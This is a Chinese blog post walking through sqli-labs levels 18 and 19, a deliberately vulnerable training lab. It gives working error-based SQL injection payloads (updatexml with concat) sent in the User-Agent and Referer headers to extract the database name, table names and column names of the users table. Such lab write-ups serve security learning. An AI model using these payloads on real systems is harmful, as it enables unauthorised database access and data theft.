sqlilab 18-19之看不懂的教程

最新推荐文章于 2024-05-20 15:36:01 发布
最新推荐文章于 2024-05-20 15:36:01 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: NYIST
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43668491/article/details/86564270
版权

第十八关:通过借鉴各种大佬的题解,最后还是一知半解,这里只说明方法(本人还没有完全吃透所以不了解为什么);

首先用正确的账号密码登录后发现页面回显了你的User-Agent,可以猜测能从User-Agent进行注入,查看源码之后果然可以~;

接下来是用burp软件进行抓包修改User-Agent,我这里就直接上语句吧;

数据库名:User-Agent: Hyafinthus' or updatexml(1,concat('#',(database())),0),'','')#

数据表名:

User-Agent: ' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),0),'','')#

字段名:

User-Agent: ' or updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),0),'','')#

第十九关:用同样的方法,发现这次换成了Referer注入,其余和上一关并无差别;

 


 

 

-Hopscotch
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-lab18和22关详解
cangyu51462的博客
05-01 476
sqli-lab18和22关详解
sqli-lab19关基于post的referer报错注入
qq_46527080的博客
12-18 422
知识点 referer: http请求头里,有一个referer首部,这个首部可以告知服务端,当前的请求的来源。 就是很直观的说,访问了一个页面,你来自哪里 extractvalue()函数 extractvalue() 函数是对XML文档进行查询的函数 其实就是相当于HTML文件中用 标签查找元素一样 语法:extractvalue(目标xml文档,xml路径) update是更新 extractvalue是查询 第十九关 sqlmap方法: 这里我们还是使用SQLMAP进行注入,将登录请求信息保存到1.
SQLI-labs-第十八关
weixin_54055099的博客
05-17 453
Sqli-labs18关,http头部注入,报错注入
sqli-labs第十八关详解
金 帛的博客
05-03 4629
SQL注入靶场第十八关详解
sqli-labs第十九关详解
金 帛的博客
05-05 2274
sqli-labs第十九关详解
sqli-labs(18-23关)
cuddlylm的博客
04-07 997
less-18(User-Agent注入) 登录失败显示ip地址 登录成功显示ip地址和User-Agent 在username和password处尝试注入均被转义,无法注入 测试的关键利用注入语句为 $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)"; 因为uagents的数据是会写入数据库再输出的,这是我们得以成功注入的关键 分
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labs--------第18
wyzhxhn的博客
11-10 1213
sql插入语句 User-Agent
sqli-labs靶场第十八关
gou1791241251的博客
12-28 2060
十八关有点特殊,后台对输入的账号和密码都调用了函数进行过滤了,所以要转换注入方式,尝试去请求头里面修改信息。 可以尝试cookie注入,user-agent注入,refer字段注入。最终在user-agent字段发现注入点,因为输入单引号或双引号时有报错显示。 这次注入前提是输入的账号密码正确才会去执行user-agent的sql语句。在此次例子用了报错注入的方式进行爆表和爆库。 ...
sqli-labs基础篇 第18~22关
Lucky小小吴的小屋
01-23 2366
sqli-labs基础篇 第18~22关,主要学习内容:burp抓包、数据包修改
Sqli-labs靶场第19关详解[Sqli-labs-less-19]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 677
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。
SQLI-labs-第十九关和第二十关
最新发布
weixin_54055099的博客
05-20 404
Sqli-labs第十九关和二十关,http头部注入,referer、cookie注入
SQLilabs的第19关——http请求头注入(Referer)(报错注入)
qq_73393033的博客
07-22 353
该语句表示显示第12个字符后面的12个字符(包括第12个字符)。在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们在截取的数据包中的Referer上加上一个'。我们发现数据没有显示完全,我们还使用mid函数,比如输入语句。它显示了Referer,我们大胆猜测注入点在这里。在进行一次验证,在referer的后面输入。这时就不会报错了,可以确定闭合方式是单引号。这说明闭合方式就是'。
sqli-labs-master安装教程
06-28
### 回答1: sqli-labs-master是一个SQL注入漏洞测试平台,安装教程如下: 1. 下载sqli-labs-master压缩包并解压缩。 2. 安装LAMP或WAMP环境,确保Apache、MySQL和PHP已经安装并配置好。 3. 将解压缩后的sqli-labs-master文件夹复制到Apache或WAMP的web目录下。 4. 在MySQL中创建一个名为“sqli-labs”的数据库,并将sqli-labs文件夹中的“db-creds.inc”文件中的用户名和密码修改为您的MySQL用户名和密码。 5. 在浏览器中访问http://localhost/sqli-labs-master/setup.php,这将创建所需的数据库表和数据。 6. 访问http://localhost/sqli-labs-master/index.html,您将看到sqli-labs的主页。 7. 点击“Lessons”链接,您将看到一系列的SQL注入漏洞测试用例,您可以选择其中的一个进行测试。 8. 在测试用例页面中,您可以看到注入点和注入语句,您可以使用工具如SQLMap等进行注入测试。 希望这个安装教程对您有所帮助。 ### 回答2: sqli-labs-master是一款模拟SQL注入漏洞的实验平台,能够帮助安全研究人员和学生进行SQL注入漏洞的实践操作。以下是关于sqli-labs-master的安装教程: 第一步:系统准备 要在本地安装sqli-labs-master,首先需要将Apache、PHP和MySQL安装在操作系统上。在Debian上,可以使用以下命令进行安装: sudo apt-get install apache2 mysql-server php5 php5-mysql libapache2-mod-php5 在Redhat/CentOS上,请使用以下命令: yum install httpd mysql mysql-server php php-mysql php-gd 安装完成后,请根据需要修改MySQL的root密码,以确保安全性。 第二步:下载sqli-labs-master 可以在GitHub上下载sqli-labs-master,解压缩后将文件夹放入Apache Web服务器的根目录(通常是/var/www/html/)中。 在终端中进入sqli-labs-master目录并运行以下命令来创建数据库: mysql -u root -p < dbs/sqli-labs.sql 第三步:设置数据库连接 打开includes/config.php文件,并修改以下行以反映你的数据库连接设置: $dbuser='root'; // 要替换为MySQL用户名$dbpass='password'; // 要替换为MySQL密码$dbname='sl-db'; // 要替换为数据库名称 第四步:启动Apache Web服务器 启动Apache Web服务器以在浏览器中访问sqli-labs-master。在Ubuntu上,可以使用以下命令: sudo service apache2 start 在Redhat/CentOS上,可以使用以下命令: sudo service httpd start 第五步:访问sqli-labs-master 打开Web浏览器并访问http://localhost/sqli-labs-master。如果一切正常,您将看到sqli-labs-master的主页面。在那里,您可以从“选择级别”下拉菜单中选择不同的安全级别,以练习不同类型的SQL注入攻击。 总之,sqli-labs-master是一个非常有用和实用的实验平台,可以帮助安全研究人员和学生提高SQL注入漏洞的实践操作水平和技能。 ### 回答3: sqli-labs-master是一款用于学习SQL注入的漏洞实验平台,使用它可以了解SQL注入攻击的原理、细节和防御方法。下面是sqli-labs-master的安装教程。 1. 下载sqli-labs-master,可以在Github上进行下载。下载后解压缩到Web服务器的根目录(如/var/www/html/)。 2. 安装LAMP环境。LAMP环境由Linux、Apache、MySQL和PHP构成,是基于Linux系统的Web环境。可以使用yum安装,命令为yum install httpd mariadb-server php php-mysql。 3. 在浏览器中输入localhost/sqli-labs-master启动安装向导。按照提示进行安装,需要设置MySQL的用户名和密码,这些信息将在后续使用中需要。 4. 在Web服务器上建立一个名为“security”(或其他名称)的数据库,用于存储实验中的数据。可以使用MySQL的命令行或phpMyAdmin来创建。 5. 启动实验。在浏览器中输入localhost/sqli-labs-master,可以看到一系列缺陷的Web应用程序。点击每个应用程序,进入到实验中,尝试利用SQL注入漏洞获取数据或改变数据。 6. 学习SQL注入攻击的原理、流程和防御方法。通过实验,可以了解SQL注入攻击的操作流程,如何构造注入语句和绕过防御措施。同时,也可以学习如何防范SQL注入攻击,如输入数据校验、使用预编译语句和过滤特殊字符等方式。 总之,sqli-labs-master是一款非常有用的学习SQL注入的工具,通过它可以了解SQL注入的原理和实践,从而提高Web应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值